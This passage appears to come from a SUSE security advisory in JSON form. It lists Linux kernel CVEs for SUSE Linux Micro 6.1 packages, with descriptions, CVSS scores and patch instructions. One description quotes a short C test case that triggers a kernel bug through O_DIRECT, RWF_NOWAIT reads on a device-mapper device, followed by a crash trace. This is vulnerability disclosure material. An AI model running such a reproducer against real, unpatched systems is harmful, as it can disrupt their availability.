"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53857"
},
{
"cve": "CVE-2023-53858",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53858"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: samsung_tty: Fix a memory leak in s3c24xx_serial_getclk() in case of error\n\nIf clk_get_rate() fails, the clk that has just been allocated needs to be\nfreed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53858",
"url": "https://www.suse.com/security/cve/CVE-2023-53858"
},
{
"category": "external",
"summary": "SUSE Bug 1254704 for CVE-2023-53858",
"url": "https://bugzilla.suse.com/1254704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53858"
},
{
"cve": "CVE-2023-53860",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53860"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: don\u0027t attempt to queue IO under RCU protection\n\ndm looks up the table for IO based on the request type, with an\nassumption that if the request is marked REQ_NOWAIT, it\u0027s fine to\nattempt to submit that IO while under RCU read lock protection. This\nis not OK, as REQ_NOWAIT just means that we should not be sleeping\nwaiting on other IO, it does not mean that we can\u0027t potentially\nschedule.\n\nA simple test case demonstrates this quite nicely:\n\nint main(int argc, char *argv[])\n{\n struct iovec iov;\n int fd;\n\n fd = open(\"/dev/dm-0\", O_RDONLY | O_DIRECT);\n posix_memalign(\u0026iov.iov_base, 4096, 4096);\n iov.iov_len = 4096;\n preadv2(fd, \u0026iov, 1, 0, RWF_NOWAIT);\n return 0;\n}\n\nwhich will instantly spew:\n\nBUG: sleeping function called from invalid context at include/linux/sched/mm.h:306\nin_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 5580, name: dm-nowait\npreempt_count: 0, expected: 0\nRCU nest depth: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 7 PID: 5580 Comm: dm-nowait Not tainted 6.6.0-rc1-g39956d2dcd81 #132\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x11d/0x1b0\n __might_resched+0x3c3/0x5e0\n ? preempt_count_sub+0x150/0x150\n mempool_alloc+0x1e2/0x390\n ? mempool_resize+0x7d0/0x7d0\n ? lock_sync+0x190/0x190\n ? lock_release+0x4b7/0x670\n ? internal_get_user_pages_fast+0x868/0x2d40\n bio_alloc_bioset+0x417/0x8c0\n ? bvec_alloc+0x200/0x200\n ? internal_get_user_pages_fast+0xb8c/0x2d40\n bio_alloc_clone+0x53/0x100\n dm_submit_bio+0x27f/0x1a20\n ? lock_release+0x4b7/0x670\n ? blk_try_enter_queue+0x1a0/0x4d0\n ? dm_dax_direct_access+0x260/0x260\n ? rcu_is_watching+0x12/0xb0\n ? blk_try_enter_queue+0x1cc/0x4d0\n __submit_bio+0x239/0x310\n ? __bio_queue_enter+0x700/0x700\n ? kvm_clock_get_cycles+0x40/0x60\n ? ktime_get+0x285/0x470\n submit_bio_noacct_nocheck+0x4d9/0xb80\n ? should_fail_request+0x80/0x80\n ? preempt_count_sub+0x150/0x150\n ? lock_release+0x4b7/0x670\n ? __bio_add_page+0x143/0x2d0\n ? iov_iter_revert+0x27/0x360\n submit_bio_noacct+0x53e/0x1b30\n submit_bio_wait+0x10a/0x230\n ? submit_bio_wait_endio+0x40/0x40\n __blkdev_direct_IO_simple+0x4f8/0x780\n ? blkdev_bio_end_io+0x4c0/0x4c0\n ? stack_trace_save+0x90/0xc0\n ? __bio_clone+0x3c0/0x3c0\n ? lock_release+0x4b7/0x670\n ? lock_sync+0x190/0x190\n ? atime_needs_update+0x3bf/0x7e0\n ? timestamp_truncate+0x21b/0x2d0\n ? inode_owner_or_capable+0x240/0x240\n blkdev_direct_IO.part.0+0x84a/0x1810\n ? rcu_is_watching+0x12/0xb0\n ? lock_release+0x4b7/0x670\n ? blkdev_read_iter+0x40d/0x530\n ? reacquire_held_locks+0x4e0/0x4e0\n ? __blkdev_direct_IO_simple+0x780/0x780\n ? rcu_is_watching+0x12/0xb0\n ? __mark_inode_dirty+0x297/0xd50\n ? preempt_count_add+0x72/0x140\n blkdev_read_iter+0x2a4/0x530\n do_iter_readv_writev+0x2f2/0x3c0\n ? generic_copy_file_range+0x1d0/0x1d0\n ? fsnotify_perm.part.0+0x25d/0x630\n ? security_file_permission+0xd8/0x100\n do_iter_read+0x31b/0x880\n ? import_iovec+0x10b/0x140\n vfs_readv+0x12d/0x1a0\n ? vfs_iter_read+0xb0/0xb0\n ? rcu_is_watching+0x12/0xb0\n ? rcu_is_watching+0x12/0xb0\n ? lock_release+0x4b7/0x670\n do_preadv+0x1b3/0x260\n ? do_readv+0x370/0x370\n __x64_sys_preadv2+0xef/0x150\n do_syscall_64+0x39/0xb0\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7f5af41ad806\nCode: 41 54 41 89 fc 55 44 89 c5 53 48 89 cb 48 83 ec 18 80 3d e4 dd 0d 00 00 74 7a 45 89 c1 49 89 ca 45 31 c0 b8 47 01 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 0f 87 be 00 00 00 48 85 c0 79 4a 48 8b 0d da 55\nRSP: 002b:00007ffd3145c7f0 EFLAGS: 00000246 ORIG_RAX: 0000000000000147\nRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5af41ad806\nRDX: 0000000000000001 RSI: 00007ffd3145c850 RDI: 0000000000000003\nRBP: 0000000000000008 R08: 0000000000000000 R09: 0000000000000008\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000003\nR13: 00007ffd3145c850 R14: 000055f5f0431dd8 R15: 0000000000000001\n \u003c/TASK\u003e\n\nwhere in fact it is\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53860",
"url": "https://www.suse.com/security/cve/CVE-2023-53860"
},
{
"category": "external",
"summary": "SUSE Bug 1254626 for CVE-2023-53860",
"url": "https://bugzilla.suse.com/1254626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53860"
},
{
"cve": "CVE-2023-53861",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53861"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: correct grp validation in ext4_mb_good_group\n\nGroup corruption check will access memory of grp and will trigger kernel\ncrash if grp is NULL. So do NULL check before corruption check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53861",
"url": "https://www.suse.com/security/cve/CVE-2023-53861"
},
{
"category": "external",
"summary": "SUSE Bug 1254678 for CVE-2023-53861",
"url": "https://bugzilla.suse.com/1254678"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53861"
},
{
"cve": "CVE-2023-53863",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53863"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: do not hard code device address lenth in fdb dumps\n\nsyzbot reports that some netdev devices do not have a six bytes\naddress [1]\n\nReplace ETH_ALEN by dev-\u003eaddr_len.\n\n[1] (Case of a device where dev-\u003eaddr_len = 4)\n\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak in copyout+0xb8/0x100 lib/iov_iter.c:169\ninstrument_copy_to_user include/linux/instrumented.h:114 [inline]\ncopyout+0xb8/0x100 lib/iov_iter.c:169\n_copy_to_iter+0x6d8/0x1d00 lib/iov_iter.c:536\ncopy_to_iter include/linux/uio.h:206 [inline]\nsimple_copy_to_iter+0x68/0xa0 net/core/datagram.c:513\n__skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419\nskb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:527\nskb_copy_datagram_msg include/linux/skbuff.h:3960 [inline]\nnetlink_recvmsg+0x4ae/0x15a0 net/netlink/af_netlink.c:1970\nsock_recvmsg_nosec net/socket.c:1019 [inline]\nsock_recvmsg net/socket.c:1040 [inline]\n____sys_recvmsg+0x283/0x7f0 net/socket.c:2722\n___sys_recvmsg+0x223/0x840 net/socket.c:2764\ndo_recvmmsg+0x4f9/0xfd0 net/socket.c:2858\n__sys_recvmmsg net/socket.c:2937 [inline]\n__do_sys_recvmmsg net/socket.c:2960 [inline]\n__se_sys_recvmmsg net/socket.c:2953 [inline]\n__x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was stored to memory at:\n__nla_put lib/nlattr.c:1009 [inline]\nnla_put+0x1c6/0x230 lib/nlattr.c:1067\nnlmsg_populate_fdb_fill+0x2b8/0x600 net/core/rtnetlink.c:4071\nnlmsg_populate_fdb net/core/rtnetlink.c:4418 [inline]\nndo_dflt_fdb_dump+0x616/0x840 net/core/rtnetlink.c:4456\nrtnl_fdb_dump+0x14ff/0x1fc0 net/core/rtnetlink.c:4629\nnetlink_dump+0x9d1/0x1310 net/netlink/af_netlink.c:2268\nnetlink_recvmsg+0xc5c/0x15a0 net/netlink/af_netlink.c:1995\nsock_recvmsg_nosec+0x7a/0x120 net/socket.c:1019\n____sys_recvmsg+0x664/0x7f0 net/socket.c:2720\n___sys_recvmsg+0x223/0x840 net/socket.c:2764\ndo_recvmmsg+0x4f9/0xfd0 net/socket.c:2858\n__sys_recvmmsg net/socket.c:2937 [inline]\n__do_sys_recvmmsg net/socket.c:2960 [inline]\n__se_sys_recvmmsg net/socket.c:2953 [inline]\n__x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was created at:\nslab_post_alloc_hook+0x12d/0xb60 mm/slab.h:716\nslab_alloc_node mm/slub.c:3451 [inline]\n__kmem_cache_alloc_node+0x4ff/0x8b0 mm/slub.c:3490\nkmalloc_trace+0x51/0x200 mm/slab_common.c:1057\nkmalloc include/linux/slab.h:559 [inline]\n__hw_addr_create net/core/dev_addr_lists.c:60 [inline]\n__hw_addr_add_ex+0x2e5/0x9e0 net/core/dev_addr_lists.c:118\n__dev_mc_add net/core/dev_addr_lists.c:867 [inline]\ndev_mc_add+0x9a/0x130 net/core/dev_addr_lists.c:885\nigmp6_group_added+0x267/0xbc0 net/ipv6/mcast.c:680\nipv6_mc_up+0x296/0x3b0 net/ipv6/mcast.c:2754\nipv6_mc_remap+0x1e/0x30 net/ipv6/mcast.c:2708\naddrconf_type_change net/ipv6/addrconf.c:3731 [inline]\naddrconf_notify+0x4d3/0x1d90 net/ipv6/addrconf.c:3699\nnotifier_call_chain kernel/notifier.c:93 [inline]\nraw_notifier_call_chain+0xe4/0x430 kernel/notifier.c:461\ncall_netdevice_notifiers_info net/core/dev.c:1935 [inline]\ncall_netdevice_notifiers_extack net/core/dev.c:1973 [inline]\ncall_netdevice_notifiers+0x1ee/0x2d0 net/core/dev.c:1987\nbond_enslave+0xccd/0x53f0 drivers/net/bonding/bond_main.c:1906\ndo_set_master net/core/rtnetlink.c:2626 [inline]\nrtnl_newlink_create net/core/rtnetlink.c:3460 [inline]\n__rtnl_newlink net/core/rtnetlink.c:3660 [inline]\nrtnl_newlink+0x378c/0x40e0 net/core/rtnetlink.c:3673\nrtnetlink_rcv_msg+0x16a6/0x1840 net/core/rtnetlink.c:6395\nnetlink_rcv_skb+0x371/0x650 net/netlink/af_netlink.c:2546\nrtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6413\nnetlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\nnetlink_unicast+0xf28/0x1230 net/netlink/af_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
